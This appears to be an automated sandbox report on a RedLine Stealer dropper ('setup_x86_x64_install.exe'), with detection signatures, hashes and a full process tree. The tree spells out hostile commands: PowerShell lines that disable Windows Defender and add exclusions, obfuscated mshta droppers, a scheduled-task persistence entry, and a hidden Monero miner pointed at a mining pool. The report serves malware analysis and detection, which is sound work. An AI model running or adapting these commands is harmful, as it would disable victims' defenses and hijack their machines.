Resubmissions
27-10-2021 12:55
211027-p592qaegd7 1027-10-2021 05:03
211027-fpnzwaaff8 1026-10-2021 14:24
211026-rqs6rshff8 10Analysis
-
max time kernel
17s -
max time network
1820s -
platform
windows7_x64 -
resource
win7-de-20210920 -
submitted
26-10-2021 14:24
General
-
Target
setup_x86_x64_install.exe
-
Size
5.6MB
-
MD5
8dfefd1f56f2ac4f1869d86edbb4aa8f
-
SHA1
3a65b0920890fd7e8ae751ee15f76de281584010
-
SHA256
433e51a49b84a52cd5f740a12ec46a145d3c14a95e529d4ef32fd250e02829ed
-
SHA512
996a84df42b79c8786f4347b875621a476bd6a0e71d4c61fd47a726fb9f6717051d03d8b381233e7966c1a2150628b8b7986727298a6fc803aea504f96fd934c
Score
10/10
Malware Config
Signatures
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 2 IoCs
-
ASPack v2.12-2.42 6 IoCs
Detects executables packed with ASPack v2.12-2.42
-
Downloads MZ/PE file
-
Executes dropped EXE 22 IoCs
-
Loads dropped DLL 64 IoCs
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 5 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
autoit_exe 3 IoCs
AutoIT scripts compiled to PE executables.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 7 IoCs
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Kills process with taskkill 4 IoCs
-
Suspicious use of AdjustPrivilegeToken 36 IoCs
-
Suspicious use of FindShellTrayWindow 2 IoCs
-
Suspicious use of SendNotifyMessage 2 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS0B6A5656\setup_install.exe"C:\Users\Admin\AppData\Local\Temp\7zS0B6A5656\setup_install.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable5⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"5⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue0985edbf92e08954.exe4⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS0B6A5656\Tue0985edbf92e08954.exeTue0985edbf92e08954.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue09c257807a702a4.exe4⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\7zS0B6A5656\Tue09c257807a702a4.exeTue09c257807a702a4.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\Pictures\Adobe Films\J_NIlXjWSBSpSzAzlzSh2Y4m.exe"C:\Users\Admin\Pictures\Adobe Films\J_NIlXjWSBSpSzAzlzSh2Y4m.exe"6⤵
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 952 -s 7166⤵
- Program crash
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue097328c1b990.exe4⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\7zS0B6A5656\Tue097328c1b990.exeTue097328c1b990.exe5⤵
- Executes dropped EXE
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue0978af55b9.exe4⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\7zS0B6A5656\Tue0978af55b9.exeTue0978af55b9.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"6⤵
-
C:\Users\Admin\AppData\Local\Temp\BCleanSoft82.exe"C:\Users\Admin\AppData\Local\Temp\BCleanSoft82.exe"7⤵
-
C:\Users\Admin\AppData\Roaming\1834371.exe"C:\Users\Admin\AppData\Roaming\1834371.exe"8⤵
-
-
C:\Users\Admin\AppData\Roaming\5864827.exe"C:\Users\Admin\AppData\Roaming\5864827.exe"8⤵
-
-
C:\Users\Admin\AppData\Roaming\8339713.exe"C:\Users\Admin\AppData\Roaming\8339713.exe"8⤵
-
-
C:\Users\Admin\AppData\Roaming\6936789.exe"C:\Users\Admin\AppData\Roaming\6936789.exe"8⤵
-
-
C:\Users\Admin\AppData\Roaming\6432149.exe"C:\Users\Admin\AppData\Roaming\6432149.exe"8⤵
-
-
C:\Users\Admin\AppData\Roaming\4499329.exe"C:\Users\Admin\AppData\Roaming\4499329.exe"8⤵
-
-
C:\Users\Admin\AppData\Roaming\5783515.exe"C:\Users\Admin\AppData\Roaming\5783515.exe"8⤵
-
C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"9⤵
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\inst1.exe"C:\Users\Admin\AppData\Local\Temp\inst1.exe"7⤵
-
-
C:\Users\Admin\AppData\Local\Temp\Soft1WW02.exe"C:\Users\Admin\AppData\Local\Temp\Soft1WW02.exe"7⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2920 -s 8928⤵
- Program crash
-
-
-
C:\Users\Admin\AppData\Local\Temp\4.exe"C:\Users\Admin\AppData\Local\Temp\4.exe"7⤵
-
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"8⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\5.exe"C:\Users\Admin\AppData\Local\Temp\5.exe"7⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 1044 -s 14408⤵
- Program crash
-
-
-
C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"7⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ). Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If """" == """" for %M in ( ""C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"" ) do taskkill -f -iM ""%~NxM"" " , 0 , truE ) )8⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If "" == "" for %M in ( "C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe" ) do taskkill -f -iM "%~NxM"9⤵
-
C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi10⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ). Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If ""/PLQtzfgO0m8dRv4iYALOqi "" == """" for %M in ( ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ) do taskkill -f -iM ""%~NxM"" " , 0 , truE ) )11⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If "/PLQtzfgO0m8dRv4iYALOqi " == "" for %M in ( "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ) do taskkill -f -iM "%~NxM"12⤵
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScRIpt: CLosE ( cReAteobjEcT ( "wscRiPt.SheLl" ). RUn ( "C:\Windows\system32\cmd.exe /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~> TRMBiI66.CU & EcHo | Set /P = ""MZ"" > hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V + 1W8lBDVH.AOu + WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC & Del /q *& starT msiexec -Y ..\lXQ2g.WC " , 0, tRUE ) )11⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~> TRMBiI66.CU & EcHo | Set /P = "MZ" >hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V + 1W8lBDVH.AOu + WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC & Del /q *& starT msiexec -Y ..\lXQ2g.WC12⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" Set /P = "MZ" 1>hKS2IU.1Q"13⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" EcHo "13⤵
-
-
C:\Windows\SysWOW64\msiexec.exemsiexec -Y ..\lXQ2g.WC13⤵
-
-
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -iM "search_hyperfs_206.exe"10⤵
- Kills process with taskkill
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\setup.exe"C:\Users\Admin\AppData\Local\Temp\setup.exe"7⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "setup.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\setup.exe" & exit8⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "setup.exe" /f9⤵
- Kills process with taskkill
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\juanli-game.exe"C:\Users\Admin\AppData\Local\Temp\juanli-game.exe"7⤵
-
-
C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe"C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe"7⤵
-
-
C:\Users\Admin\AppData\Local\Temp\10.exe"C:\Users\Admin\AppData\Local\Temp\10.exe"7⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 1940 -s 14128⤵
- Program crash
-
-
-
C:\Users\Admin\AppData\Local\Temp\Chrome5.exe"C:\Users\Admin\AppData\Local\Temp\Chrome5.exe"7⤵
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\Chrome5.exe"8⤵
-
C:\Windows\System32\cmd.exe"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Roaming\services64.exe"9⤵
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Roaming\services64.exe"10⤵
- Creates scheduled task(s)
-
-
-
C:\Windows\System32\cmd.exe"cmd" cmd /c "C:\Users\Admin\AppData\Roaming\services64.exe"9⤵
-
C:\Users\Admin\AppData\Roaming\services64.exeC:\Users\Admin\AppData\Roaming\services64.exe10⤵
- Loads dropped DLL
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Roaming\services64.exe"11⤵
-
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"12⤵
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "/sihost64"13⤵
- Executes dropped EXE
- Loads dropped DLL
-
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.udda/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6OAdluV/h8Wx+uVST9CwRTBBZDSizq+6yEkb73lzV2SG" --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=5 --cinit-idle-cpu=60 --tls --cinit-stealth12⤵
-
-
-
-
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue09c6db969ab9.exe4⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\7zS0B6A5656\Tue09c6db969ab9.exeTue09c6db969ab9.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\7zS0B6A5656\Tue09c6db969ab9.exeC:\Users\Admin\AppData\Local\Temp\7zS0B6A5656\Tue09c6db969ab9.exe6⤵
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue09a30919dc5f00.exe4⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\7zS0B6A5656\Tue09a30919dc5f00.exeTue09a30919dc5f00.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbscrIPT: CLosE( creatEobjeCt ( "WSCRIpt.Shell" ). RUN ( "C:\Windows\system32\cmd.exe /R TYPe ""C:\Users\Admin\AppData\Local\Temp\7zS0B6A5656\Tue09a30919dc5f00.exe"" > ..\WG1uEEN.EXe && StarT ..\WG1uEEn.Exe -PhwqM9LteEkjDz5gZPyhw9N49u86 & If """" == """" for %b In (""C:\Users\Admin\AppData\Local\Temp\7zS0B6A5656\Tue09a30919dc5f00.exe"" ) do taskkill /f /iM ""%~Nxb"" " , 0 , TRUe ) )6⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /R TYPe "C:\Users\Admin\AppData\Local\Temp\7zS0B6A5656\Tue09a30919dc5f00.exe" > ..\WG1uEEN.EXe && StarT ..\WG1uEEn.Exe -PhwqM9LteEkjDz5gZPyhw9N49u86 & If "" == "" for %b In ("C:\Users\Admin\AppData\Local\Temp\7zS0B6A5656\Tue09a30919dc5f00.exe" ) do taskkill /f /iM "%~Nxb"7⤵
-
C:\Users\Admin\AppData\Local\Temp\WG1uEEN.EXe..\WG1uEEn.Exe -PhwqM9LteEkjDz5gZPyhw9N49u868⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbscrIPT: CLosE( creatEobjeCt ( "WSCRIpt.Shell" ). RUN ( "C:\Windows\system32\cmd.exe /R TYPe ""C:\Users\Admin\AppData\Local\Temp\WG1uEEN.EXe"" > ..\WG1uEEN.EXe && StarT ..\WG1uEEn.Exe -PhwqM9LteEkjDz5gZPyhw9N49u86 & If ""-PhwqM9LteEkjDz5gZPyhw9N49u86 "" == """" for %b In (""C:\Users\Admin\AppData\Local\Temp\WG1uEEN.EXe"" ) do taskkill /f /iM ""%~Nxb"" " , 0 , TRUe ) )9⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /R TYPe "C:\Users\Admin\AppData\Local\Temp\WG1uEEN.EXe" > ..\WG1uEEN.EXe && StarT ..\WG1uEEn.Exe -PhwqM9LteEkjDz5gZPyhw9N49u86 & If "-PhwqM9LteEkjDz5gZPyhw9N49u86 " == "" for %b In ("C:\Users\Admin\AppData\Local\Temp\WG1uEEN.EXe" ) do taskkill /f /iM "%~Nxb"10⤵
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBscrIpT: cloSE ( cREateObJEct ( "wsCRipt.SheLl" ). rUn ( "Cmd.exe /q /R ecHo | sEt /P = ""MZ"" > ~dWBNpV.F & Copy /b /y ~dWbNpV.F + YsLNPQ.k + 9Jd86KPL.RS + 6VTZU.XA8+CQ3X0._ + 3hAXC.X ..\2GBhNGG.N &sTaRt msiexec.exe /y ..\2GbhNGG.n & DEl /Q * " , 0, TRue ) )9⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /q /R ecHo | sEt /P = "MZ" > ~dWBNpV.F & Copy /b /y ~dWbNpV.F + YsLNPQ.k + 9Jd86KPL.RS + 6VTZU.XA8+CQ3X0._ + 3hAXC.X ..\2GBhNGG.N &sTaRt msiexec.exe /y ..\2GbhNGG.n & DEl /Q *10⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" sEt /P = "MZ" 1>~dWBNpV.F"11⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" ecHo "11⤵
-
-
C:\Windows\SysWOW64\msiexec.exemsiexec.exe /y ..\2GbhNGG.n11⤵
-
-
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /iM "Tue09a30919dc5f00.exe"8⤵
- Kills process with taskkill
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue09c1731fe55c7.exe4⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\7zS0B6A5656\Tue09c1731fe55c7.exeTue09c1731fe55c7.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\7zS0B6A5656\Tue09c1731fe55c7.exeC:\Users\Admin\AppData\Local\Temp\7zS0B6A5656\Tue09c1731fe55c7.exe6⤵
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue09786995c7f02a923.exe4⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\7zS0B6A5656\Tue09786995c7f02a923.exeTue09786995c7f02a923.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\4873913913.exe"6⤵
-
C:\Users\Admin\AppData\Local\Temp\4873913913.exe"C:\Users\Admin\AppData\Local\Temp\4873913913.exe"7⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2728 -s 5608⤵
- Program crash
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 940 -s 9326⤵
- Program crash
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue0947ef38552fc.exe4⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\7zS0B6A5656\Tue0947ef38552fc.exeTue0947ef38552fc.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Users\Public\run.exeC:\Users\Public\run.exe6⤵
-
-
C:\Users\Public\run2.exeC:\Users\Public\run2.exe6⤵
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" https://iplogger.org/18tji77⤵
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2708 CREDAT:275457 /prefetch:28⤵
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue09792fda06e.exe4⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\7zS0B6A5656\Tue09792fda06e.exeTue09792fda06e.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue091e2054cef7.exe4⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\7zS0B6A5656\Tue091e2054cef7.exeTue091e2054cef7.exe5⤵
- Executes dropped EXE
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\_Dzpafigaxd.vbs"6⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ExclusionPath C:\,'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Google\Qekdqa.exe'7⤵
-
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Dzpafigaxd.vbs"6⤵
-
C:\Users\Admin\AppData\Local\Temp\Fphrgjtnjgrqbtrochalunsaintly_2021-10-24_21-38.exe"C:\Users\Admin\AppData\Local\Temp\Fphrgjtnjgrqbtrochalunsaintly_2021-10-24_21-38.exe"7⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\MSBuild.exeC:\Users\Admin\AppData\Local\Temp\MSBuild.exe6⤵
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue09264824c4.exe4⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\7zS0B6A5656\Tue09264824c4.exeTue09264824c4.exe5⤵
- Executes dropped EXE
-
C:\Users\Admin\Pictures\Adobe Films\auEmnFP18WgstEst_dfekoCj.exe"C:\Users\Admin\Pictures\Adobe Films\auEmnFP18WgstEst_dfekoCj.exe"6⤵
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1848 -s 14606⤵
- Program crash
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue0990c8b597f.exe4⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\7zS0B6A5656\Tue0990c8b597f.exeTue0990c8b597f.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\is-GJRF9.tmp\Tue0990c8b597f.tmp"C:\Users\Admin\AppData\Local\Temp\is-GJRF9.tmp\Tue0990c8b597f.tmp" /SL5="$101A2,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS0B6A5656\Tue0990c8b597f.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\7zS0B6A5656\Tue0990c8b597f.exe"C:\Users\Admin\AppData\Local\Temp\7zS0B6A5656\Tue0990c8b597f.exe" /SILENT7⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-Q4324.tmp\Tue0990c8b597f.tmp"C:\Users\Admin\AppData\Local\Temp\is-Q4324.tmp\Tue0990c8b597f.tmp" /SL5="$201A2,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS0B6A5656\Tue0990c8b597f.exe" /SILENT8⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-EC4ND.tmp\postback.exe"C:\Users\Admin\AppData\Local\Temp\is-EC4ND.tmp\postback.exe" ss19⤵
-
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue0956c36b51.exe /mixone4⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\7zS0B6A5656\Tue0956c36b51.exeTue0956c36b51.exe /mixone5⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "Tue0956c36b51.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\7zS0B6A5656\Tue0956c36b51.exe" & exit6⤵
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue093cbcf0222440.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS0B6A5656\Tue093cbcf0222440.exeTue093cbcf0222440.exe5⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS0B6A5656\Tue093cbcf0222440.exe"C:\Users\Admin\AppData\Local\Temp\7zS0B6A5656\Tue093cbcf0222440.exe" -u6⤵
- Executes dropped EXE
- Loads dropped DLL
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue0971aafeebb6f.exe4⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\7zS0B6A5656\Tue0971aafeebb6f.exeTue0971aafeebb6f.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
-
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "Tue0956c36b51.exe" /f1⤵
- Kills process with taskkill
-
C:\Windows\system32\taskeng.exetaskeng.exe {5C002774-4A5E-4C47-8192-614E93954CD8} S-1-5-18:NT AUTHORITY\System:Service:1⤵
-
C:\Users\Admin\AppData\Local\Temp\EEF1.exeC:\Users\Admin\AppData\Local\Temp\EEF1.exe1⤵
-
C:\Users\Admin\AppData\Roaming\Smart Clock\SmartClock.exe"C:\Users\Admin\AppData\Roaming\Smart Clock\SmartClock.exe"2⤵
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {24B7986D-A5E2-4B8B-BB2C-BE2E45E0D506} S-1-5-21-3456797065-1076791440-4146276586-1000:JZCKHXIN\Admin:Interactive:[1]1⤵
-
C:\Program Files\Mozilla Firefox\default-browser-agent.exe"C:\Program Files\Mozilla Firefox\default-browser-agent.exe" do-task2⤵
-
-
C:\Users\Admin\AppData\Roaming\vwcgcaaC:\Users\Admin\AppData\Roaming\vwcgcaa2⤵
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
12.3MB
-
Filesize
12.3MB
-
Filesize
304KB
-
Filesize
1.6MB
-
Filesize
168KB
-
Filesize
12.3MB
-
Filesize
12.3MB
-
Filesize
12.3MB
-
Filesize
296KB
-
Filesize
164KB
-
Filesize
43.1MB
-
Filesize
4KB
-
Filesize
36KB
-
Filesize
43.0MB
-
Filesize
36KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
8KB
-
Filesize
4KB
-
Filesize
8KB
-
Filesize
1.5MB
-
Filesize
152KB
-
Filesize
1.5MB
-
Filesize
1.5MB
-
Filesize
100KB
-
Filesize
572KB
-
Filesize
152KB
-
Filesize
100KB
-
Filesize
100KB
-
Filesize
1.5MB
-
Filesize
572KB
-
Filesize
100KB
-
Filesize
1.5MB
-
Filesize
572KB
-
Filesize
572KB
-
Filesize
8KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
80KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
80KB
-
Filesize
4KB
-
Filesize
8KB